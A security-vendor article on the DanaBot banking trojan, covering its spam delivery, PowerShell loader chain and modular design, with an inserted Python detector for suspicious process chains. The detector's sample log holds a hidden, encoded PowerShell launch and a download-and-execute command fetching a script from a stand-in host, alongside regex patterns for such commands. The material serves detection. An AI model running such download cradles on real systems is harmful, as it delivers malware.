Security researchers from ESET recently discovered a banking trojan named DanaBot (detected by Trend Micro as TROJ_BANLOAD.THFOAAH) being distributed to European countries via spam emails. Here’s what you need to know about this threat, how users and businesses can defend against it, and how managed detection and response can help address this threat.
DanaBot is a banking trojan, written in the Delphi programming language, capable of stealing credentials and hijacking infected systems. It is distributed via spam emails masquerading as invoices with a malicious attachment that, when executed, abuses PowerShell — a legitimate system administration tool — and a Visual Basic script (VBScript) loader called BrushaLoader to retrieve and execute its modules.
When it was first discovered, DanaBot used Word documents embedded with a malicious macro that, once enabled, downloads DanaBot via PowerShell. Security researchers noted that the use of BrushaLoader in the recent spam campaigns is a new addition, and that DanaBot itself has been updated.
[RELATED NEWS: Evolving Trickbot adds detection evasion and screen-locking features]
DanaBot was first seen being distributed to Australian users via spam with a malicious Word document that claims the user is “protected” by a security company. DanaBot’s command-and-control (C&C) server first checks the affected system’s IP address, and delivers the banking trojan if it is located in Australia.
DanaBot’s operators have since expanded their targets. The recent spam campaigns are now distributed to European countries, particularly Austria, Germany, Italy, Poland, and Ukraine. The emails still pose as invoices, but PowerShell and BrushaLoader are now used to download DanaBot’s various components.
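The infection chain described above (a document attachment that launches a script host, which in turn launches PowerShell to fetch the payload) leaves a recognizable parent/child process trail that endpoint telemetry can surface. The following Python script is an added example, not code from the article or from Trend Micro; it parses a constructed, tab-separated process-creation log format (ParentImage / Image / CommandLine, in the style of Sysmon event 1) and flags Office-to-script-host and script-host-to-shell chains plus a few generic PowerShell command-line heuristics. The process names, the rule names and the sample log lines are all assumptions made for the example.

```python
import ntpath
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Process families for the chain: Office app -> script host -> shell (example lists, not exhaustive).
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Generic command-line heuristics for download-and-execute stages.
# Written for this example; they are not signatures taken from the article.
CMDLINE_RULES = [
    ("encoded_command", re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("download_cradle", re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer", re.I)),
    ("in_memory_exec", re.compile(r"\biex\b|invoke-expression", re.I)),
]

@dataclass
class ProcEvent:
    parent: str    # basename of the parent image, lower-cased
    image: str     # basename of the created process image, lower-cased
    cmdline: str

@dataclass
class Alert:
    event: ProcEvent
    reasons: List[str] = field(default_factory=list)

    @property
    def severity(self) -> str:
        chain = {"office_spawned_script_or_shell", "script_host_spawned_shell"} & set(self.reasons)
        if "office_spawned_script_or_shell" in chain or (chain and len(self.reasons) > 1):
            return "high"
        if chain or len(self.reasons) > 1:
            return "medium"
        return "low"

# Constructed record format: ParentImage=<path>\tImage=<path>\tCommandLine=<text>
LINE_RE = re.compile(r"^ParentImage=(.*?)\tImage=(.*?)\tCommandLine=(.*)$")

def parse_event(line: str) -> Optional[ProcEvent]:
    """Parse one process-creation record; return None for lines that do not match."""
    m = LINE_RE.match(line.rstrip("\n"))
    if not m:
        return None
    parent, image, cmdline = m.groups()
    # ntpath handles Windows paths on any host OS.
    return ProcEvent(ntpath.basename(parent).lower(), ntpath.basename(image).lower(), cmdline)

def evaluate(ev: ProcEvent) -> List[str]:
    """Return the list of rule names the event triggers (chain rules first, then command-line rules)."""
    reasons = []
    if ev.parent in OFFICE_APPS and ev.image in (SCRIPT_HOSTS | SHELLS):
        reasons.append("office_spawned_script_or_shell")
    if ev.parent in SCRIPT_HOSTS and ev.image in SHELLS:
        reasons.append("script_host_spawned_shell")
    if ev.image in SHELLS:
        for name, rx in CMDLINE_RULES:
            if rx.search(ev.cmdline):
                reasons.append(name)
    return reasons

def analyze(lines: List[str]) -> List[Alert]:
    """Run every record through the rules and collect the ones that fire."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev is not None:
            reasons = evaluate(ev)
            if reasons:
                alerts.append(Alert(ev, reasons))
    return alerts

def record(parent: str, image: str, cmdline: str) -> str:
    """Build one record in the constructed log format."""
    return f"ParentImage={parent}\tImage={image}\tCommandLine={cmdline}"

# Constructed sample telemetry: two stages of a document -> script host -> PowerShell chain,
# plus benign activity that must not fire (explorer-launched PowerShell, a scheduled script, a print helper).
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_LOG = [
    record(OFFICE, r"C:\Windows\System32\wscript.exe",
           r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\AppData\Local\Temp\invoice_7731.vbs"'),
    record(r"C:\Windows\System32\wscript.exe", PS,
           r"powershell.exe -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    record(r"C:\Windows\explorer.exe", PS, r"powershell.exe -NoProfile Get-ChildItem C:\Users\alice\Documents"),
    record(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\cscript.exe",
           r"cscript.exe //nologo C:\Scripts\inventory.vbs"),
    record(OFFICE, r"C:\Windows\splwow64.exe", r"C:\Windows\splwow64.exe 12288"),
    record(r"C:\Windows\System32\cmd.exe", PS,
           r'''powershell -NoP -Exec Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"'''),
]

if __name__ == "__main__":
    for a in analyze(SAMPLE_LOG):
        print(f"[{a.severity}] {a.event.parent} -> {a.event.image}: {', '.join(a.reasons)}")
```

The chain rules carry most of the weight: a word processor spawning wscript.exe is rare enough in normal use that it deserves an alert on its own, while the command-line heuristics mainly raise confidence and would need tuning against an environment's legitimate automation before being used for blocking.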
[Trend Micro 2018 Midyear Security Roundup: Fileless, macro and small-sized malware challenges purely file-based security technologies]
DanaBot is notable for its multistage infection chain and modular architecture. Prior research from Trustwave, along with ESET's new research, identifies DanaBot as comprising several components — mostly dynamic-link libraries (DLLs) — that perform separate functions. The identified plug-ins steal credentials from various applications, provide Remote Desktop Protocol (RDP) functionality to other Windows-based computers, and inject scripts into browsers, among other functions.
[Best Practices: InfoSec Guide: Web Injections]
While modular malware isn’t new, it can pose significant risks given its stealthy nature. In fact, this technique is increasingly used by botnets, other information and file stealers, Android malware, point-of-sale (PoS) malware, and even cyberespionage campaigns. Modular malware can be difficult to detect. For instance, a module can be programmed to terminate, or to do nothing, unless another module is running, so a malware component can dwell within an affected system for a long time before it is executed. Attackers can also program a module to run on its own without relying on other components. In this case, the malware can carry out information theft while its other components, with other functionalities, remain hidden. Uncovering one component doesn’t guarantee that the others will be found.
Defending against modular malware like DanaBot requires a multilayered approach. Here are some best practices:
[READ: Data Breaches Highlight the Need for Managed Detection and Response]
Ideally, businesses should have the necessary security mechanisms in place to defend against stealthy threats, but enterprises may find it arduous given budget constraints (such as in hiring or retaining security specialists) or the worsening cybersecurity skills gap. A security strategy that enterprises can consider is using managed detection and response (MDR), which provides comprehensive threat hunting services and access to security specialists who can help enterprises investigate, proactively respond to, and remediate evasive threats.
For example, detecting or blocking one of a modular malware’s components doesn’t ensure that its other plug-ins can be found. In a modular PoS malware like FastPOS, for instance, the random access memory (RAM)-scraping module can run as a separate service, and may be easier to remove. However, its keylogging module may be difficult to detect if it injects its code into a legitimate process. It takes a proactive approach to identify where malware could be dwelling and to correlate its activity — whether it is downloading additional payloads or has infected other processes, for instance. MDR provides the technology and especially the expertise needed to develop a proactive incident response and remediation strategy that can mitigate threats and cyberattacks.
Trend Micro’s managed detection and response service allows customers to investigate security alerts without the need to hire qualified incident response staff. It provides alert monitoring, alert prioritization, investigation, and threat hunting services to Trend Micro customers. By applying artificial intelligence models to customer endpoint data, network data, and server information, the service can correlate and prioritize advanced threats. Trend Micro threat researchers can investigate prioritized alerts to determine the extent and spread of the attack and work with the customer to provide a detailed remediation plan.